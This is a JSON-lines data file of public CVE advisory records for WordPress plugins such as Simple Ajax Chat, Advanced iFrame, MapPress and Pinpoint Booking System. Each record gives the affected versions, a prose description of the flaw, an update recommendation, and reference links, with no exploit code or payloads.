{"CVE_ID":"CVE-2024-2470","slug":"simple-ajax-chat","versionImpact":"20240318","versionEndExcluding":"20240412","description":"The Simple Ajax Chat  WordPress plugin before 20240412 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 20240412, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8514b8ce-ff23-4aba-b2f1-fd36beb7d2ff\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8514b8ce-ff23-4aba-b2f1-fd36beb7d2ff\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0431","slug":"gestpay-for-woocommerce","versionImpact":"20221130","versionEndExcluding":"20240307","description":"The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_set_default_card' function. This makes it possible for unauthenticated attackers to set the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3a6650-5be0-4162-93eb-369538a2ebc5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestpay-for-woocommerce\\\/trunk\\\/inc\\\/class-gestpay-cards.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestpay-for-woocommerce\\\/trunk\\\/inc\\\/class-gestpay-cards.php#L117\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1983","slug":"simple-ajax-chat","versionImpact":"20240216","versionEndExcluding":"20240223","description":"The Simple Ajax Chat  WordPress plugin before 20240223 does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.","recommendation":"Update to version 20240223, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3a31de-a227-4db1-bd18-ce6a78dc96fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3a31de-a227-4db1-bd18-ce6a78dc96fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7065","slug":"stop-spammer-registrations-plugin","versionImpact":"2024.4","versionEndExcluding":"2024.5","description":"The Stop Spammers Security | Block Spam Users, Comments, Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2024.4. This is due to missing or incorrect nonce validation on the sfs_process AJAX action. This makes it possible for unauthenticated attackers to add arbitrary IPs to the plugin's allowlist and blocklist via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2024.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1998cadb-2eb3-4819-aa7c-59e4f777c7f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1998cadb-2eb3-4819-aa7c-59e4f777c7f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080581%40stop-spammer-registrations-plugin&new=3080581%40stop-spammer-registrations-plugin&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080581%40stop-spammer-registrations-plugin&new=3080581%40stop-spammer-registrations-plugin&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4365","slug":"advanced-iframe","versionImpact":"2024.3","versionEndExcluding":"2024.4","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018add_iframe_url_as_param_direct\u2019 parameter in versions up to, and including, 2024.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2024.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21990e54-c3a2-4bca-b164-132ad456e651?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21990e54-c3a2-4bca-b164-132ad456e651?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-after-iframe.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-after-iframe.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090438\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090438\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8621","slug":"daily-prayer-time-for-mosques","versionImpact":"2024.08.26","versionEndExcluding":"2024.09.14","description":"The Daily Prayer Time plugin for WordPress is vulnerable to SQL Injection via the 'max_word' attribute of the 'quran_verse' shortcode in all versions up to, and including, 2024.08.26 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2024.09.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/866e4bc3-080a-4498-b210-e692d72d3db0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/866e4bc3-080a-4498-b210-e692d72d3db0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/daily-prayer-time-for-mosques\\\/tags\\\/2024.08.26\\\/Models\\\/QuranADay\\\/QuranDB.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/daily-prayer-time-for-mosques\\\/tags\\\/2024.08.26\\\/Models\\\/QuranADay\\\/QuranDB.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151906\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151906\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2872","slug":"socialdriver-framework","versionEndExcluding":"2024.04.30","description":"The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2024.04.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15d3150c-673c-4c36-ac5e-85767d78b9eb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15d3150c-673c-4c36-ac5e-85767d78b9eb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2696","slug":"socialdriver-framework","versionEndExcluding":"2024.04.30","description":"The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2024.04.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6e64af0-adeb-4e28-9a81-f4024b0446ee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6e64af0-adeb-4e28-9a81-f4024b0446ee\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2870","slug":"socialdriver-framework","versionEndExcluding":"2024.04.30","description":"The socialdriver-framework WordPress plugin before 2024.04.30 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2024.04.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/688522d2-ee28-44f8-828d-352f06e43885\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/688522d2-ee28-44f8-828d-352f06e43885\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2430","slug":"show-website-content-in-wordpress-page-or-post","versionImpact":"2024.03.27","versionEndExcluding":"2024.04.09","description":"The Website Content in Page or Post WordPress plugin before 2024.04.09 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2024.04.09, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/990b7d7a-3d7a-46d5-9aeb-740de817e2d9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/990b7d7a-3d7a-46d5-9aeb-740de817e2d9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2697","slug":"socialdriver-framework","versionEndExcluding":"2024.0.0","description":"The socialdriver-framework WordPress plugin before 2024.0.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","recommendation":"Update to version 2024.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c430b30d-61db-45f5-8499-91b491503b9c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c430b30d-61db-45f5-8499-91b491503b9c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7069","slug":"advanced-iframe","versionImpact":"2023.10","versionEndExcluding":"2024.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2023.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2024.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e32c51d-2d96-4545-956f-64f65c54b33b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e32c51d-2d96-4545-956f-64f65c54b33b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027702%40advanced-iframe&new=3027702%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027702%40advanced-iframe&new=3027702%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4826","slug":"socialdriver","versionEndExcluding":"2024","description":"The SocialDriver WordPress theme before version 2024 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties resulting in a cross-site scripting (XSS) attack.","recommendation":"Update to version 2024, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99ec0add-8f4d-4d68-91aa-80b1631a53bf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99ec0add-8f4d-4d68-91aa-80b1631a53bf\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"http:\\\/\\\/socialdriver.com\",\"name\":\"http:\\\/\\\/socialdriver.com\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4775","slug":"advanced-iframe","versionImpact":"2023.8","versionEndExcluding":"2023.9","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'advanced_iframe' shortcode in versions up to, and including, 2023.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2023.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9944443-2e71-45c4-8a19-d76863cf66df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9944443-2e71-45c4-8a19-d76863cf66df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L552\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L552\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php?rev=2961394#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2993602\\\/advanced-iframe\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2993602\\\/advanced-iframe\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2489","slug":"stop-spammer-registrations-plugin","versionEndExcluding":"2023","description":"The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2023 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcbe3334-357a-4744-b50c-309d10cca30d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcbe3334-357a-4744-b50c-309d10cca30d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2488","slug":"stop-spammer-registrations-plugin","versionEndExcluding":"2023","description":"The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2023 does not sanitise and escape various parameters before outputting them back in admin dashboard pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60226669-0b7b-441f-93d4-b5933e69478f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/60226669-0b7b-441f-93d4-b5933e69478f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11087","slug":"miniorange-login-openid","versionImpact":"200.3.9","versionEndExcluding":"200.3.10","description":"The miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 200.3.9. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 200.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.miniorange.com\\\/\",\"name\":\"https:\\\/\\\/www.miniorange.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f677b257-606a-45f2-ba85-3a56b8df2a3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f677b257-606a-45f2-ba85-3a56b8df2a3c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7313","slug":"wp-simple-firewall","versionImpact":"20.0.5","versionEndExcluding":"20.0.6","description":"The Shield Security  WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 20.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83a1bdc6-098e-43d5-89e5-f4202ecd78a1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83a1bdc6-098e-43d5-89e5-f4202ecd78a1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0251","slug":"advanced-woo-search","versionImpact":"2.96","versionEndExcluding":"2.97","description":"The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed.","recommendation":"Update to version 2.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L2170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.94\\\/includes\\\/class-aws-integrations.php#L2170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.97\\\/includes\\\/class-aws-integrations.php#L2104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.97\\\/includes\\\/class-aws-integrations.php#L2104\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2055","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.94.8","versionEndExcluding":"2.94.9","description":"The MapPress Maps for WordPress plugin before 2.94.9 does not sanitise and escape some parameters when outputing them in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.94.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8bfdbbf-6963-4fab-826a-6be770ac72c3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8bfdbbf-6963-4fab-826a-6be770ac72c3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10715","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.94.1","versionEndExcluding":"2.94.2","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Map block in all versions up to, and including, 2.94.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.94.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d966924-aeab-4397-9555-78291af70efe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d966924-aeab-4397-9555-78291af70efe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180900\\\/mappress-google-maps-for-wordpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180900\\\/mappress-google-maps-for-wordpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2162","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.94.9","versionEndExcluding":"2.94.10","description":"The MapPress Maps for WordPress plugin before 2.94.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.94.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06063788-7ab8-49cc-9911-1d9926fcf99d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8620","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.92.2","versionEndExcluding":"2.93","description":"The MapPress Maps for WordPress plugin before 2.93 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8b0ddd8-0380-4185-aa00-8437e2b617ad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8b0ddd8-0380-4185-aa00-8437e2b617ad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2082","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.7","versionEndExcluding":"2.9.9.8","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.9.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cefcd612-0ba8-4225-8f23-817b7220ee7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cefcd612-0ba8-4225-8f23-817b7220ee7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2043","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.7","versionEndExcluding":"2.9.9.8","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when downloading form submissions in all versions up to, and including, 2.9.9.7. This makes it possible for unauthenticated attackers to view form submissions.","recommendation":"Update to version 2.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a40ed3c-1f4b-4bf7-b6f4-fc1e145cc989?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a40ed3c-1f4b-4bf7-b6f4-fc1e145cc989?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7112","slug":"booking-system","versionImpact":"2.9.9.5.0","versionEndExcluding":"2.9.9.5.1","description":"The Pinpoint Booking System \u2013 #1 WordPress Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the \u2018schedule\u2019 parameter in all versions up to, and including, 2.9.9.5.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.9.9.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7358cd-fec8-4a16-ae6b-14194bb63396?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7358cd-fec8-4a16-ae6b-14194bb63396?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147739\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147739\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3636","slug":"UNKNOWN-CVE-2023-25062-1","versionImpact":"2.9.9.4.7","versionEndExcluding":"2.9.9.4.8","description":"The Pinpoint Booking System  WordPress plugin before 2.9.9.4.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.9.9.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bab46c28-71aa-4610-9683-361e7b008d37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bab46c28-71aa-4610-9683-361e7b008d37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
